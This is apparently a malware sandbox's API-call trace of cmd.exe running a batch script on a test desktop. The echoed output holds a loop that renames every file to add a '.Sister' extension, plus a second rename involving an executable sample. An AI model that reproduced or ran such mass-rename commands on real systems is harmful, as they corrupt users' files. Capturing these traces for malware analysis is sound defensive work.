0x21ed8c7b3a0 [0105.274] GetProcessHeap () returned 0x21ed8c70000 [0105.274] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8c77830 [0105.275] GetProcessHeap () returned 0x21ed8c70000 [0105.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96280 [0105.275] _wcsicmp (_String1="for", _String2=")") returned 61 [0105.275] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0105.275] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0105.275] GetProcessHeap () returned 0x21ed8c70000 [0105.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96940 [0105.275] GetProcessHeap () returned 0x21ed8c70000 [0105.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cb20 [0105.275] GetProcessHeap () returned 0x21ed8c70000 [0105.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8c7d160 [0105.275] GetProcessHeap () returned 0x21ed8c70000 [0105.275] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d160, Size=0x18) returned 0x21ed8c7d160 [0105.275] GetProcessHeap () returned 0x21ed8c70000 [0105.276] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d160) returned 0x18 [0105.276] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0105.276] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0105.276] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0105.276] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0105.276] _wcsicmp (_String1="IN", _String2="in") returned 0 [0105.276] GetProcessHeap () returned 0x21ed8c70000 [0105.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96880 [0105.276] _wcsicmp (_String1="DO", _String2="do") returned 0 [0105.276] _wcsicmp (_String1="ren", _String2=")") returned 73 [0105.276] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0105.276] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0105.277] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0105.277] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0105.277] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0105.277] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0105.277] GetProcessHeap () returned 0x21ed8c70000 [0105.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96d00 [0105.277] GetProcessHeap () returned 0x21ed8c70000 [0105.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7b100 [0105.277] GetProcessHeap () returned 0x21ed8c70000 [0105.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bb20 [0105.278] _tell (_FileHandle=3) returned 320 [0105.278] _close (_FileHandle=3) returned 0 [0105.278] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0105.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.278] GetFileType (hFile=0x50) returned 0x2 [0105.278] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0105.279] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0105.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.367] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0105.553] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0105.553] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0105.553] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0105.553] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0105.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.553] GetFileType (hFile=0x50) returned 0x2 [0105.554] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0105.554] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0105.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.680] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x18) returned 1 [0105.808] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0105.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.808] GetFileType (hFile=0x50) returned 0x2 [0105.808] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0105.808] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0105.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.935] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0106.013] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0106.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.013] GetFileType (hFile=0x50) returned 0x2 [0106.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0106.013] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0106.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.170] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0106.311] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fea18 | out: _Buffer="(*) do ") returned 7 [0106.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.312] GetFileType (hFile=0x50) returned 0x2 [0106.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0106.312] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0106.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.632] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x7) returned 1 [0106.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.783] GetFileType (hFile=0x50) returned 0x2 [0106.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0106.783] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0107.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.089] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7b3b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c7b3b0*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0107.231] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%a\" \"%~a.Sister\" ") returned 19 [0107.231] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.231] GetFileType (hFile=0x50) returned 0x2 [0107.231] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0107.232] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0107.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.443] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x13) returned 1 [0107.732] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9e8 | out: _Buffer=" & ") returned 3 [0107.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.732] GetFileType (hFile=0x50) returned 0x2 [0107.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0107.732] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0107.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.896] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0108.055] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe9b8 | out: _Buffer="for") returned 3 [0108.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.055] GetFileType (hFile=0x50) returned 0x2 [0108.055] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0108.056] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0108.198] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.198] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x3) returned 1 [0108.343] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" %a in ") returned 7 [0108.343] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.343] GetFileType (hFile=0x50) returned 0x2 [0108.343] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0108.343] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0108.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.650] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x7) returned 1 [0108.795] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0108.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.795] GetFileType (hFile=0x50) returned 0x2 [0108.795] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0108.795] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0108.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0108.964] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x55) returned 1 [0109.106] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.106] GetFileType (hFile=0x50) returned 0x2 [0109.106] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0109.106] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe978 | out: lpMode=0xa6cf4fe978) returned 1 [0109.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.265] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7b110*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9b8, lpReserved=0x0 | out: lpBuffer=0x21ed8c7b110*, lpNumberOfCharsWritten=0xa6cf4fe9b8*=0x3) returned 1 [0109.428] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe9b8 | out: _Buffer=" \"%~a.Sister\" \"%~na.bat\" ") returned 25 [0109.428] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.428] GetFileType (hFile=0x50) returned 0x2 [0109.428] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0109.428] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe948 | out: lpMode=0xa6cf4fe948) returned 1 [0109.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.745] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe988, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe988*=0x19) returned 1 [0109.927] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0109.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.928] GetFileType (hFile=0x50) returned 0x2 [0109.928] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0109.928] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0110.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.089] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0110.251] malloc (_Size=0xffce) returned 0x21ed8e90940 [0110.255] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0110.255] GetProcessHeap () returned 0x21ed8c70000 [0110.255] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cd60 [0110.255] GetProcessHeap () returned 0x21ed8c70000 [0110.255] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c7b340 [0110.255] GetProcessHeap () returned 0x21ed8c70000 [0110.255] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95ac0 [0110.255] GetProcessHeap () returned 0x21ed8c70000 [0110.255] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95840 [0110.255] GetProcessHeap () returned 0x21ed8c70000 [0110.255] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x16) returned 0x21ed8c95620 [0110.255] GetProcessHeap () returned 0x21ed8c70000 [0110.255] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95620) returned 0x16 [0110.255] GetProcessHeap () returned 0x21ed8c70000 [0110.255] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95700 [0110.256] FindFirstFileExW (in: lpFileName="*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fe640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fe640) returned 0x21ed8c7cac0 [0110.256] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x454b4664, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x454b4664, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="..", cAlternateFileName="")) returned 1 [0110.257] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f0e7c0, ftCreationTime.dwHighDateTime=0x1d5e81d, ftLastAccessTime.dwLowDateTime=0xb506470, ftLastAccessTime.dwHighDateTime=0x1d5e6fd, ftLastWriteTime.dwLowDateTime=0xb506470, ftLastWriteTime.dwHighDateTime=0x1d5e6fd, nFileSizeHigh=0x0, nFileSizeLow=0x10be7, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="0kL8UpxhMP3oFa.avi", cAlternateFileName="")) returned 1 [0110.257] GetProcessHeap () returned 0x21ed8c70000 [0110.257] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c787c0, Size=0x8) returned 0x21ed8c787c0 [0110.257] GetProcessHeap () returned 0x21ed8c70000 [0110.257] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8c95c40 [0110.257] _wcsicmp (_String1="*", _String2=".") returned -4 [0110.257] _wcsicmp (_String1="*", _String2="..") returned -4 [0110.257] GetFileAttributesW (lpFileName="*" (normalized: "c:\\users\\fd1hvy\\desktop\\*")) returned 0xffffffff [0110.257] GetLastError () returned 0x7b [0110.257] GetProcessHeap () returned 0x21ed8c70000 [0110.257] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95540 [0110.258] GetProcessHeap () returned 0x21ed8c70000 [0110.258] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95540, Size=0x38) returned 0x21ed8c95eb0 [0110.258] GetProcessHeap () returned 0x21ed8c70000 [0110.258] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95eb0) returned 0x38 [0110.258] GetProcessHeap () returned 0x21ed8c70000 [0110.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ca7a80 [0110.258] GetProcessHeap () returned 0x21ed8c70000 [0110.258] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ca7a80, Size=0x30) returned 0x21ed8ca7a80 [0110.258] GetProcessHeap () returned 0x21ed8c70000 [0110.258] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ca7a80) returned 0x30 [0110.258] GetProcessHeap () returned 0x21ed8c70000 [0110.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ca7ac0 [0110.258] malloc (_Size=0x1ff9c) returned 0x21ed8ea0920 [0110.260] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8c95ef0 [0110.261] ??_V@YAXPEAX@Z () returned 0x1 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ca7ac0, Size=0x1a0) returned 0x21ed8ca7ac0 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ca7ac0) returned 0x1a0 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ca7c70 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ca7c70, Size=0x290) returned 0x21ed8ca7c70 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ca7c70) returned 0x290 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ca7f10 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ca7f10, Size=0x30) returned 0x21ed8ca7f10 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ca7f10) returned 0x30 [0110.261] GetProcessHeap () returned 0x21ed8c70000 [0110.261] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ca7f50 [0110.261] malloc (_Size=0x1ff9c) returned 0x21ed8ea0920 [0110.262] GetProcessHeap () returned 0x21ed8c70000 [0110.262] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8c7d190 [0110.262] ??_V@YAXPEAX@Z () returned 0x1 [0110.262] malloc (_Size=0x1ff9c) returned 0x21ed8ea0920 [0110.262] GetFullPathNameW (in: lpFileName="0kL8UpxhMP3oFa.avi", nBufferLength=0xffce, lpBuffer=0x21ed8ea0920, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi", lpFilePart=0xa6cf4fe1c8*="0kL8UpxhMP3oFa.avi") returned 0x2a [0110.262] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0110.262] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0110.263] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ca60 [0110.263] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0110.263] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x454b4664, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x454b4664, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0110.263] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0110.263] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0kL8UpxhMP3oFa.avi", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f0e7c0, ftCreationTime.dwHighDateTime=0x1d5e81d, ftLastAccessTime.dwLowDateTime=0xb506470, ftLastAccessTime.dwHighDateTime=0x1d5e6fd, ftLastWriteTime.dwLowDateTime=0xb506470, ftLastWriteTime.dwHighDateTime=0x1d5e6fd, nFileSizeHigh=0x0, nFileSizeLow=0x10be7, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kL8UpxhMP3oFa.avi", cAlternateFileName="0KL8UP~1.AVI")) returned 0x21ed8c7d000 [0110.263] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0110.263] _wcsnicmp (_String1="0KL8UP~1.AVI", _String2="0kL8UpxhMP3oFa.avi", _MaxCount=0x12) returned 6 [0110.264] malloc (_Size=0x1ff9c) returned 0x21ed8ec08d0 [0110.264] ??_V@YAXPEAX@Z () returned 0x21ed8ec08d0 [0110.265] GetProcessHeap () returned 0x21ed8c70000 [0110.265] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8c7d1d0 [0110.265] ??_V@YAXPEAX@Z () returned 0x1 [0110.265] ??_V@YAXPEAX@Z () returned 0x1 [0110.265] GetProcessHeap () returned 0x21ed8c70000 [0110.265] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ca7f50, Size=0x1a0) returned 0x21ed8ca7f50 [0110.265] GetProcessHeap () returned 0x21ed8c70000 [0110.265] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ca7f50) returned 0x1a0 [0110.265] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0110.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.265] GetFileType (hFile=0x50) returned 0x2 [0110.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0110.265] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0110.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0110.409] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0110.699] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0110.699] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0110.699] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 